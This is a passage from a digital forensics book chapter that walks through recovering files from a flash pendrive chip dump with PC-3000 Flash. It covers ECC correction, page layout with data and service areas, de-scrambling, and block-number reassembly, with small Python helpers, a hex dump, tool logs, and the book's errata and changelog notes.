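    """Undo bitwise-inversion scrambling."""
    return bytes(b ^ 0xFF for b in dump)

def strip_service_areas(dump: bytes, da: int = 512, sa: int = 16) -> bytes:
    """Keep only the data area of each (da + sa)-byte sector."""
    step = da + sa
    return b"".join(dump[i:i + da] for i in range(0, len(dump), step))

def apply_graph(dump: bytes, steps: list[Transform]) -> bytes:
    """Apply each transformation to the dump, in order."""
    for step in steps:
        dump = step(dump)
    return dump

raw_dump = b""  # placeholder for the dump read from the chip
logical = apply_graph(raw_dump, [invert_bits, strip_service_areas])
```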
To trigger the ECC correction, right-click on entry 0 in the Items column. If you had previously defined two or more chips, you would now see a sub-column with the chip number (0, 1, …) under Items for each chip; you would then have to perform the ECC correction and re-reading for each chip individually. To start the ECC correction you select Data correction via ECC -> ECC autodetection:

12.37 - Start ECC correction

This analysis may take some time depending on the size of the dump. If the ECC data cannot be determined during the fast analysis, you will be asked whether a complete analysis should be performed. Once ECC data is found, you see the following question:

12.38 - ECC data found dialog

After clicking the Yes button, you see the following in the Log tab:
>>>>>>>>>>>>>>>>>>> Detect ECC for sector = 528 bytes
Check ECC process
****************
start time 9/4/2022 4:28:43 PM
finish time 9/4/2022 4:28:45 PM
------------------------------------------------------------------
total time 00:00:02
******************************************************************

The information that a sector is 528 bytes long will be needed later. I suggest noting down such things, as the log may get very long over time. That's why I have a notebook and a pen next to each data recovery workstation!

Then you can perform the re-reading based on the ECC data. Only pages that could not be corrected during the ECC correction are re-read. To do this, right-click on item 0 and then on Tools -> Read Retry -> ReadRetry mode checking:

12.39 - Find re-reading methods

After that, you get a list of possible read retry modes:
12.40 - Re-read method list

This list is sorted by probability. Here you can see from the rating of 1% that this very old chip either does not support special re-reading commands or the appropriate commands for this chip are not available in PC-3000 Flash. In such a case, I then check how many sectors are faulty. To do this, right-click again on item 0 and then select the entry Map from the context menu:

12.41 - Start map building

Here you see a pictorial representation of all read pages. To see the bad sectors, you click on the down arrow next to ECC in the toolbar and then select the entry Create submap use ECC info:
12.42 - Start building submap based on ECC info

Then you see the following window:

12.43 - Select parameters for submap

Here you select Invalid sectors and click OK. Then you get a graphical overview of the bad sectors:

12.44 - Uncorrected sectors

In this case, there are only 4 bad sectors, or 1 page. In the next step, with such an old pendrive, you have to check whether a scrambling of the data has taken place or not. This scrambling can be done in one of the following three ways:
1. Bitwise inversion
2. XOR
3. Encryption

To check whether the data is scrambled, right-click on entry 0 under Items and then select the entry Raw recovery:

12.45 - Start RAW recovery

The following window will appear. Here you can initiate the search for files by clicking on the play button in the toolbar. After that, you can look at the data sorted by file type:

12.46 - RAW recovery results

Since PC-3000 found some files, there is no scrambling. However, when you open an image, the file is damaged:
12.47 - Image-fragments in wrong order

The data is readable, but the order of the data is completely wrong because of the wear leveling! Next, look at the entries under FAT folder. This is the data used to define a folder in the FAT filesystem. These entries are usually quite short and fit into a single page. This makes this data ideal for use in the Page Designer. To do this, right-click on the entries in the list and then select Add to search results:

12.48 - Add search results

The following dialog appears:
12.49 - Define results ID

Confirm the ID with OK. Then everything is ready for splitting the pages into sectors with the page designer. Open the page designer again via the context menu:

12.50 - Open page designer

The following window will appear:

12.51 - Page designer window

Here you can see the content of a page in the left pane. To the right, you can define and edit the division of pages into individual sectors. Just below that, you find the previously added search results. As soon as you click on one of the search results, you see the first page in which the data of this file is stored.

A page contains a certain number (4, 8, 16, 32, …) of sectors in the so-called data area (DA) and some additional bytes.
These additional bytes are called the service area (SA), and they contain ECC data and markers. Each page conversion must consist of sectors with 512 bytes in the data area and at least 2 bytes in the service area. So the smallest possible fragments are 514 bytes per sector. Of course, several data areas can also follow each other directly, with the service areas for the individual sectors located at the end of the page or in one block after every 2 or 4 sectors. In addition, one of the service areas can be larger and contain service data for both the sector and the entire page. However, an unequal division of the page into sectors with service areas of different sizes is rather the exception. As a rule, the service areas of all sectors are the same size!

The de-scrambling of the data with XOR depends on the page layout, so often no manual page conversion has to be carried out; the layout is automatically detected after the application of XOR and suggested to the user. Now let's take a closer look at a page:

0x0000 2E20 2020 2020 2020 2020 2010 0000 4CA1 . ...L¡
0x0010 B54A B54A 0100 4CA1 B54A 5FAA 0000 0000 µJµJ..L¡µJ_ª....
0x0020 2E2E 2020 2020 2020 2020 2010 0000 4CA1 .. ...L¡
0x0030 B54A B54A 0000 4CA1 B54A 0000 0000 0000 µJµJ..L¡µJ......
0x0040 4174 0061 0072 0067 0065 000F 0068 7400 At.a.r.g.e...ht.
0x0050 2E00 7400 7800 7400 0000 0000 FFFF FFFF ..t.x.t.....ÿÿÿÿ
0x0060 5441 5247 4554 2020 5458 5420 0000 4CA1 TARGET TXT ..L¡
0x0070 B54A B54A 0100 04A1 B54A 60AA 2300 0000 µJµJ...¡µJ`ª#...
0x0080 416C 006F 0067 0000 00FF FF0F 0000 FFFF Al.o.g...ÿÿ...ÿÿ
0x0090 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x00A0 4C4F 4720 2020 2020 2020 2020 0000 4CA1 LOG ..L¡
0x00B0 B54A B54A 0100 06A1 B54A 61AA 4518 0000 µJµJ...¡µJaªE...
0x00C0 4265 0000 00FF FFFF FFFF FF0F 0050 FFFF Be...ÿÿÿÿÿÿ..Pÿÿ
0x00D0 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x00E0 0173 0065 0073 0073 0069 000F 0050 6F00 .s.e.s.s.i...Po.
0x00F0 6E00 2E00 7300 7100 6C00 0000 6900 7400 n...s.q.l...i.t.
0x0100 5345 5353 494F 7E31 5351 4C20 0000 4CA1 SESSIO~1SQL ..L¡
0x0110 B54A B54A 0100 01A1 B54A 63AA 0040 0000 µJµJ...¡µJcª.@..
0x0120 4164 0075 006D 0070 0000 000F 0068 FFFF Ad.u.m.p.....hÿÿ
0x0130 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x0140 4455 4D50 2020 2020 2020 2010 0000 4CA1 DUMP ...L¡
0x0150 B54A B54A 0100 4CA1 B54A 67AA 0000 0000 µJµJ..L¡µJgª....
0x0160 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0170 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0180 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0190 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0200 1345 1345 FFFF D30E 4199 E706 F629 8ACD .E.EÿÿÓ.A™ç.ö)ŠÍ
0x0210 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0220 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0230 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0240 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0250 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0260 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0270 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0280 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0290 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0300 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0310 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0320 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0330 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0340 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0350 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0360 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0370 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0380 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0390 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0400 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0410 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
0x0420 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0430 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0440 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0450 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0460 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0470 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0480 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0490 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0500 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0510 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0520 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0530 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0540 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0550 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0560 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0570 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0580 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0590 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0600 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0610 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0620 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
0x0630 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0640 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0650 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0660 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0670 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0680 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0690 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0700 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0710 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0720 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0730 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0740 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0750 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0760 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0770 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0780 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0790 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x07F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0800 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0810 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0820 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0830 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι

You can see clearly that after 512 bytes of data there are 16 bytes of service area, and that there are 4 sectors in a page. These 512 + 16 bytes result in the 528 bytes per sector previously recognized by the ECC detection. To do the split manually, you can right-click the Page entry in the Tree tab and use Divide proportionally from the context menu. This will open the following window:

12.52 - Divide page proportionally

Then enter 4 so that the page gets divided into 4 sectors, and confirm this with Apply. After that, the program asks if you want to allocate the parts to the sector definitions:
12.53 - Add parts to sectors dialog

Confirm this with Yes and you get 4 sectors of 528 bytes each… To divide these sectors into data and service area, right-click on the range entry and select Divide from the context menu:

12.54 - Divide sectors in DA and SA

Then enter the length of the data area in bytes and confirm this with Apply:

12.55 - Sector length

Once you have done this for all sectors, the page conversion looks like this:
12.56 - Finished page conversion

A page conversion would not even have been necessary for this example, but this rather manageable page conversion was ideal for showing the process… Click on the down arrow next to the play button in the toolbar and then on Apply to add the page conversion to the transformation graph

12.57 - Apply page conversion

… and the following message appears:
12.58 - Transformation successful messagebox

Confirm that with OK and you will find another line in the transformation graph:

12.59 - Transformation graph with newly added page conversion

The transformation graph is basically a list of all the conversion steps that are applied to the dump. In order to get the data into the right order, you have two main options:

• a block number algorithm, in which a field within the service area is used to bring the data into the correct order, and
• a translator, which is the newer and more complex method of bringing the data into the right order!

To see whether you are dealing with a block number algorithm, you can look at the service information of all sectors. To do this, you right-click on item 0 in the second line of the transformation graph (Page conversion) and select Service information from the context menu. After that, you will see the following window:
12.60 - Service information, top sectors

Here you see in each line the 16 bytes of the service area of each sector. Since in a block number algorithm the numbering of the blocks is at the beginning of the service area, you scroll through the data. While the later bytes are constantly changing, you only see the value 0x00 in the first 6 bytes. So I scroll down a little further and see the following:

12.61 - Service information, later sectors

Here again the first 6 bytes remain the same and the other 10 bytes are constantly changing.
12.62 - Service information, top sectors

A bit further down you see the same picture. If you pay close attention to the transition from block 00138 to the next block, you see that the first few bytes change along with the block. So you clearly have a pendrive that works on the basis of one of the block number algorithms. Which one exactly, you can determine by research or with the trial-and-error method.

You can also use the Solution Center for research. To do so, right-click on the headline Chips in the left pane and select Search solution from the context menu. The solutions will be searched based on the controller model you entered when creating the case and the ID read from the chip.

I want to demonstrate the trial-and-error approach here. To do this, right-click again on item 0 in the last line of the transformation graph and then select Data analysis -> Block number -> Block number (Type 1) [0x0000]:
The Type 1 algorithm [0x0000] is usually quite universal and is my first choice. Type 2 is for a different controller, and Type 4 would be for a Kingston SD card, so you can exclude those for this example. If Type 1 doesn't fit, you can try Type 5, Type 7 and Type 9. As soon as you click the entry for Type 1, the following window appears:
12.64 - Block number type 0000 dialog
For the first attempt, activate the Autodetect checkbox and start the process. You then see the following output in the log tab:
[05.09.2022 11:09:25]: Applying method : Block number (Type 1) [0x0000]...
[05.09.2022 11:09:26]: Algorithm parameters autodetection... Block size detection
[05.09.2022 11:09:28]: Shift of marker within sector: 512 Calculated value of block size: 0256 Probability: 318464 Mask: 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Shift of marker within sector: 513 Calculated value of block size: 0256 Probability: 318464 Mask: Undefined! Identifier structure: Undefined! Variant is not correct and removed from analysis
[05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block size: 0256 Probability: 318464 Mask: 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Variants of marker position:
[05.09.2022 11:09:29]: Shift of marker within sector: 512 Calculated value of block size: 0256 Probability: 318464 Mask: 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block size: 0256 Probability: 318464 Mask: 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Try other parameters in case of bad result.
[05.09.2022 11:09:29]: The following parameters will be applied:
[05.09.2022 11:09:29]: Marker position............. 512
[05.09.2022 11:09:29]: Block Size (in sectors)..... 256
[05.09.2022 11:09:29]: Shift of the analysis start. 0
[05.09.2022 11:09:29]: Mask........................ 0xFFFF
[05.09.2022 11:09:29]: Identifier structure........ 1234
[05.09.2022 11:09:29]: Blocks integrity testing.... No
[05.09.2022 11:09:29]: Blocks within the bounds of bank..... NO
[05.09.2022 11:09:29]: Page Size................... 8
[05.09.2022 11:09:29]: Sector number for getting marker value (The main passage): 0
[05.09.2022 11:09:29]: Sector number for getting marker value (Additional passage): 0
[05.09.2022 11:09:29]: Direct Image Building NO
[05.09.2022 11:09:29]: Skip Block Empty first page YES
[05.09.2022 11:09:29]: Special Condition Use marker from 0 addon NO
[05.09.2022 11:09:29]: Marker analysis. Allocation by banks.
[05.09.2022 11:09:29]: Bank size 512 -> Value adjusted.
[05.09.2022 11:09:29]: Bank 00 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 01 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 02 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 03 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 04 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 05 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 06 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 07 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: ----------------------------------------------------------------
[05.09.2022 11:09:29]: Shaped banks and boundaries
[05.09.2022 11:09:29]: Bank: 000 ( Number of blocks: 00512 (0x200) ) -> Range of sectors: 000000000 - 000131071
[05.09.2022 11:09:29]: Bank: 001 ( Number of blocks: 00512 (0x200) ) -> Range of sectors: 000131072 - 000262143
[05.09.2022 11:09:29]: Bank: 002 ( Number of blocks: 00512 (0x200) ) -> Range of sectors: 000262144 - 000393215
[05.09.2022 11:09:29]: Bank: 003 ( Number of blocks: 00512 (0x200) ) -> Range of sectors: 000393216 - 000524287
[05.09.2022 11:09:29]: Bank: 004 ( Number of blocks: 00512 (0x200) ) -> Range of sectors: 000524288 - 000655359
[05.09.2022 11:09:29]: Bank: 005 ( Number of blocks: 00512 (0x200) ) -> Range of sectors: 000655360 - 000786431
[05.09.2022 11:09:29]: Bank: 006 ( Number of blocks: 00512 (0x200) ) -> Range of sectors: 000786432 - 000917503
[05.09.2022 11:09:29]: Bank: 007 ( Number of blocks: 00511 (0x1FF) ) -> Range of sectors: 000917504 - 001048319
[05.09.2022 11:09:29]: ----------------------------------------------------------------
[05.09.2022 11:09:29]: Partition header is not correct! It's recommended to use Version table and Quick disk analysis
[05.09.2022 11:09:29]: Duration : 00:00:04
Sector was read successfully
Apparently the process worked, so check the result:
12.65 - Context-menu -> View first sector
If you click the new entry in the Folders pane, you can see immediately that the result does not work: instead of presenting a filesystem, the entry cannot be expanded. This indicates the wrong block number algorithm or the wrong parameters. Before I try other parameters, I try the other algorithms. If you right-click the result and use View the first sector, you can see that this sector cannot possibly be the MBR:
12.66 - First sector of block number result
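As a sanity check on those numbers: a bank of 512 blocks with 256 sectors per block spans 512 × 256 = 131,072 sectors, which is exactly the width of each range in the log. A quick sketch of the arithmetic (the last bank is actually one block short in the log, which this simplified model ignores):

SECTORS_PER_BLOCK = 256
BLOCKS_PER_BANK = 512
SECTORS_PER_BANK = BLOCKS_PER_BANK * SECTORS_PER_BLOCK  # 131072

# Reproduce the per-bank sector ranges shown in the log above.
for bank in range(8):
    first = bank * SECTORS_PER_BANK
    last = first + SECTORS_PER_BANK - 1
    print(f"Bank {bank:03d}: sectors {first:09d} - {last:09d}")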
There is no valid partition table, nothing that looks like a bootloader, and no 0x55AA MBR signature in the last 2 bytes. You can remove the unusable Type 1 result with a right-click and the option Delete.
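This quick plausibility check is easy to reproduce outside the tool as well. A minimal sketch, assuming the suspect sector has been exported to a file (the file name is hypothetical):

# A valid MBR ends with the boot signature bytes 0x55 0xAA
# at offsets 510 and 511 of the 512-byte sector.
with open("first_sector.bin", "rb") as f:
    sector = f.read(512)

if len(sector) == 512 and sector[510:512] == b"\x55\xaa":
    print("Boot signature 0x55AA present - could be a valid MBR")
else:
    print("No boot signature - this cannot be a valid MBR")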
After that, I try Type 5, again with the Autodetect option first. However, this produces the following error in the log tab:
[05.09.2022 11:12:57]: Applying method : Block Number (Type 5) [0x1001]...
[05.09.2022 11:12:57]: Autodetection is impossible. Write parameters manually!
[05.09.2022 11:13:47]: Duration : 00:00:50
[05.09.2022 11:13:47]: Either errors occurred during recovery, or the process was interrupted.
A messagebox also informs you that the process failed and offers to delete the failed result right away:
12.67 - Block number algorithm failed message
Therefore I open the dialog for Type 5 again and remove the checkmark for Autodetect:
12.68 - Block number type 5 with default values
I leave the marker position at 512 bytes; this is consistent with what you saw in the Page designer. For Block size in sectors, I leave the proposed 256 sectors. You can easily confirm this value by viewing the service information:
12.69 - Service information
Here you see the boundary between block 0 and block 1 (B = block). Block 0 consists of pages 0x00 – 0x3F (P = pages), i.e. 0x40 (64) pages. With 4 sectors per page, you can use the Python shell to calculate:
>>> 0x40*4
256
So block 0 holds sectors 0 – 255, which confirms the 256 sectors per block. As soon as you use these values to build a virtual block device with the Apply button, you see the following messages in the log tab:
[05.09.2022 11:14:34]: Applying method : Block Number (Type 5) [0x1001]...
[05.09.2022 11:14:35]: The following parameters will be applied:
[05.09.2022 11:14:35]: Marker position............. 512
[05.09.2022 11:14:35]: Block Size (in sectors)..... 256
[05.09.2022 11:14:35]: Only even blocks............ No
[05.09.2022 11:14:50]: Duration : 00:00:15
This time you can expand the entry for Type 5:
12.70 - Block number type 5 working
The green dots also show that the JPG files are valid according to PC-3000's structure check. If you want to view one of the images, right-click the filename to open the context menu and select Open; the file is then opened with the standard program set in Windows for the respective file type. Of course, you can also back up the data:
12.71 - Save user data
To do this, I set the check mark on the folder Root (the root directory of the partition), then right-click Root in the Folders pane and select Save marked... from the context menu.
After that, you only have to specify where the data should be stored and start the process. Reading the chips is always the same, but there may be times when you need to do the de-scrambling with XOR before the ECC correction. After successfully assembling a virtual block device, you can right-click Block device (Type 5) [0x1001] and select Image to file to create a binary image of the partition, which you can then load into a forensics tool of your choice. A flash chip-off case can easily get more complex: some cases involve even more complex transformations than the one shown above! Getting good at this type of data recovery requires time, training and research. This is why I recommend that beginners start not with flash data recovery but with HDDs; even with basic knowledge, the success rate will be much higher.
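To give an idea of what such an XOR de-scrambling step involves conceptually, here is a minimal Python sketch. The repeating key and file names below are made-up placeholders; real scrambler patterns are controller-specific and typically come from research or the Solution Center:

from itertools import cycle

XOR_KEY = bytes.fromhex("a5c3")  # hypothetical repeating XOR pattern

# XOR every byte of the dump with the repeating key; ECC correction
# would then be run on the de-scrambled output, not the raw dump.
with open("chip_dump.bin", "rb") as src, open("descrambled.bin", "wb") as dst:
    data = src.read()
    dst.write(bytes(b ^ k for b, k in zip(data, cycle(XOR_KEY))))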
Errata
Reporting Errata
If you think you’ve found an error relating to spelling, grammar, or anything else that’s currently holding this book back from being the best it can be, please visit the book’s GitHub repository²⁸² and create an Issue detailing the error you’ve found. Anyone is also welcome to submit a Pull Request with new content, fixes, changes, etc.
²⁸²https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues
Changelog
• v1.0²⁸³ - August 15, 2022
• v1.1²⁸⁴ - September 10, 2022
²⁸³https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/v1.0
²⁸⁴https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/v1.1